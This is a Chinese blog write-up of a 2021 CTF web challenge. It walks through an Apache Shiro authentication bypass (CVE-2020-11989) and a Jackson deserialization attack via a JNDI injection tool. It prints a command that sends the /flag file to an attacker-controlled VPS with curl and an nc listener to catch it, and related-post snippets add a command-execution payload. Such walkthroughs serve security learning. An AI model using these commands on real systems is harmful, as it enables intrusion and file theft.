[红明谷CTF 2021]JavaWeb

最新推荐文章于 2024-03-22 19:52:34 发布
最新推荐文章于 2024-03-22 19:52:34 发布
阅读量2.1k 收藏 6
点赞数 3
分类专栏: CTF 复现 Java 文章标签: java web安全 CTF
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Mrs_H/article/details/124035038
版权
CTF 同时被 3 个专栏收录
31 篇文章 1 订阅
订阅专栏
复现
31 篇文章 4 订阅
订阅专栏
Java
1 篇文章 0 订阅
订阅专栏

[红明谷CTF 2021]JavaWeb

一.前言

好像是已经很久不刷题了,因为最近一直在忙着复习高数和专业课,拿不出太多的时间来打CTF。但是这次也总算是找到了点时间,做道java的简单题来放松一下,不能总是学那些书本上的知识了,感觉学多了也会烦。

二.正文

这道题目上来就让我们访问/login目录,所以我们直接访问试试看。
请添加图片描述
服务器那边又让我们访问/json的路径,但是我们如果用post方法对服务器进行访问的话,服务器又会返回另外的结果。
在这里插入图片描述
这里的登陆失败,就表明我们需要进行身份验证,我们尝试输入一对用户名密码。
在这里插入图片描述
还是失败,但是我们在它的Headers里面找到了Cookie
请添加图片描述
我们可以通过这里面的rememberMe=deleteMe,来判断这道题是shiro框架,我们去访问/json
在这里插入图片描述
服务器仍然返回/json,这里就需要用CVE-2020-11989来进行Apache Shiro权限绕过
请添加图片描述
我们发送请求后,服务器端返回给我们了一个报错信息,发现服务器端用到了jackson。可以猜测这里可能会存在反序列化漏洞。
我们用JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar这个工具来进行反序列化漏洞利用,并将flag外带。
使用的命令如下

java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C 'curl [VPS_IP:PORT] -File=@/flag' -A "[VPS_IP]"

在这里插入图片描述
然后我们在新建一个命令窗口,起一个nc来接收flag

nc -lnvp 9999

最后我们用CVE-2019-14439的链子打进去,用上面的springboot的payload
在这里插入图片描述

最后结果
请添加图片描述

后记

很简单的一道题,但是对于我这种刚开始java安全的人来说,还是有很多细节要去学习。

参考文章:
http://b1ue.cn/archives/189.html

入山梵行
关注
  • 3
    点赞
  • 6
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
[红明谷CTF 2021]write_shell
m0_63045593的博客
04-20 221
[红明谷CTF 2021]write_shell <?php error_reporting(0); highlight_file(__FILE__); function check($input){ if(preg_match("/'| |_|php|;|~|\\^|\\+|eval|{|}/i",$input)){ // if(preg_match("/'| |_|=|php/",$input)){ die('hacker!!!'); }else{
【网络安全渗透测试零基础入门必知必会】之CTF题目解析Java代码审计中的反序列化漏洞,以及其他漏洞的组合利用5
最新发布
Libra1313的博客
07-24 1101
这是大白给粉丝盆友们整理的网络安全渗透测试入门阶段反序列化渗透与防御第5篇。本文主要讲解java反序列化漏洞比赛题目解析本文基于一次内部小范围比赛题目的复现,简单聊聊Java代码审计中的反序列化漏洞。近年来,工作中Java Web的项目越来越常见,并且逐渐取代了前几年php的辉煌地位。在众多Java WebShiroFastjsonJBossWebLogicStructs2等等。本文基于一次内部小范围比赛题目的复现,简单聊聊Java代码审计中的反序列化漏洞,以及其他漏洞的组合利用。
Java安全-Java In CTF([红明谷CTF 2021]JavaWeb、[红明谷CTF 2021]JavaWeb
Love&Share
05-05 2303
文章目录[RoarCTF 2019]Easy Java[红明谷CTF 2021]JavaWeb [RoarCTF 2019]Easy Java 存在文件下载,尝试去读 WEB-INF/web.xml,get 传参发现一直失败 在 burp 中改为 post 传参,可以正常下载文件 只要再去读 class 文件即可 成功下载 class 放到 idea 中,拿到 flag [红明谷CTF 2021]JavaWeb 题目提示 /login 目录,访问提示 /json 访问 /json 跳回到 /lo.
2021红明谷杯数据安全大赛技能场景赛 Input Monitor
weixin_45805993的博客
09-25 1589
突然想起这个题… 先用autopsy挂载给的文件 桌面有压缩包和hint 没事,我都删掉了,之前的聊天记录都被我清干净了。除非他们在监控我输入 提示要得到输入记录 用到输入法取证https://mp.weixin.qq.com/s/0p3vbLub5vPKO5Pik9zmUQ 通过对Win10系统自带中文输入法程序运行进程的分析,发现与中文输入法相关的用户词库文件主要存储在 C:\Users\Administrator\AppData\Roaming\Microsoft\InputMethod\Chs
[HMGCTF2022]wp
Huamang的博客
03-24 4145
WEB Fan website 首先是一个www.zip的源码泄露,是laminas框架 mvc的框架首先就是看路由 在\module\Album\src\Controller\AlbumController.php里面有功能点 <?php namespace Album\Controller; use Album\Model\AlbumTable; use Laminas\Mvc\Controller\AbstractActionController; use Laminas\View\Mode
红明谷”杯数据安全大赛 技能场景赛 部分wp
Alanpipi*的博客
04-03 4944
欢迎使用Markdown编辑器 新的改变 全新的界面设计 ,将会带来全新的写作体验; 在创作中心设置你喜爱的代码高亮样式,Markdown 将代码片显示选择的高亮样式 进行展示; 增加了 图片拖拽 功能,你可以将本地的图片直接拖拽到编辑区域直接展示; 全新的 KaTeX数学公式 语法; 增加了支持甘特图的mermaid语法1 功能; 增加了 多屏幕编辑 Markdown文章功能; 增加了 焦点写作模式、预览模式、简洁写作模式、左右区域同步滚轮设置 等功能,功能按钮位于编辑区域与预览区域中间; 增加了 检查
[红明谷CTF 2021]JavaWeb buu刷题记录
weixin_51458899的博客
04-08 1844
映入眼帘的报错,然后搜一下知道是spring的洞 有个登录,然后提示json,又看到cookie cve-2020-11989 Apache Shiro 身份验证绕过漏洞 (CVE-2020-11989) - 腾讯安全玄武实验室 (tencent.com) Apache Shiro权限绕过漏洞分析(CVE-2020-11989) (qq.com) 参考这两篇,得出两种攻击方式 payload1: 双编码绕过 / -> %2f ->%25%32%66 payload2: 分号 使用payl
Java web总结(一)
Momeory的博客
10-08 926
在学习Web应用程序客户端界面设计时,我们已经知道组成一个基本的Web应用程序需要Web服务器、Web客户端浏览器、HTTP协议以及静态HTML文件。        ➣ Web服务器:接收客户端请求,然后向客户端返回一些结果;        ➣ 浏览器:允许用户请求服务器上的某个资源,并且向用户显示请求的结果;        ➣ HTML:告诉用户浏览器怎么向用户显示内容;
CTF题为例,浅学一些JAVAweb项目相关知识
Welcome To MakaRi's Blog!
03-22 1895
本文更加偏重于学习题目有关的JAVA知识,而非解题思路,题目的解题与本文讲到的知识点大多无关。但是通过题目学习这些知识可以帮助理解JAVAweb服务和数据库连接的实现,知道了JAVA如何启动服务以及如何连接数据库,这是以后进行JAVA安全学习的前提和基础。本人大一,比较菜且基础薄弱,如有错误还望大佬指点。
ctfshow web入门(java)
qq_53263789的博客
07-19 837
ctfshow
ctfweb小白必备JavaScip知识
qq_48511129的博客
02-03 399
JavaScript的代码嵌入在HTML里,直接在客户端的浏览器上执行,属于前端语言。 大多数的xss代码都是使用JavaScript语言编写的。 <!DOCTYPE html> <html lang="en"> <head> <meta charset="UTF-8"> <title>javascipt</title> </head> <body> <script>
CTFSHOW web入门 java反序列化篇(更新中)
羽的博客
12-07 4665
ctfshow web入门 java反序列化篇
ctfshow java
SopRomeo的博客
01-27 1076
web279 这个编号有点奇怪,搜搜 漏洞讲解 里面有payload直接用,我不知道啥原因echo FLAG flag不出来 因为这是动态靶机,直接看/proc/self/environ %{ #a=(new java.lang.ProcessBuilder(new java.lang.String[]{"cat","/proc/self/environ"})).redirectErrorStream(true).start(), #b=#a.getInputStream(), #c=new java.
RoarCTF 2019 Easy Java
weixin_44522540的博客
03-30 299
打开靶场,一个登陆界面,试了万能密码,行不通,点进help查看: 此时url:download,猜测是文件下载漏洞 burp抓包看下: 打开help.docx 哦豁,走远了 补充一下java web的目录结构 敏感目录 (1) /WEB-INF/web.xml:Web应用程序配置文件,描述了 servlet 和其他的应用组件配置及命名规则。 (2) /WEB-INF/classes/:含了站点所有用的 class 文件,包括 servlet class 和非servlet class,他们不能
ctfshow web入门 java web279-283
m0_62207170的博客
04-22 472
ctfshow web入门 java web279-283
[RoarCTF 2019] web题-Easy Java
BROTHERYY的博客
07-10 427
复现环境:buuoj.cn 打开环境,最开始用弱口令进去了,还心想比较简单,后来发现错了,然后点击help发现有报错 访问这个地址 tips:WEB-INF知识点 WEB-INF主要包含一下文件或目录: /WEB-INF/web.xml:Web应用程序配置文件,描述了 servlet 和其他的应用组件配置及命名规则。 /WEB-INF/classes/:含了站点所有用的 class 文件,包括 servlet class 和非servlet class,他们不能包含在 .jar文件中 /WEB-INF/
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值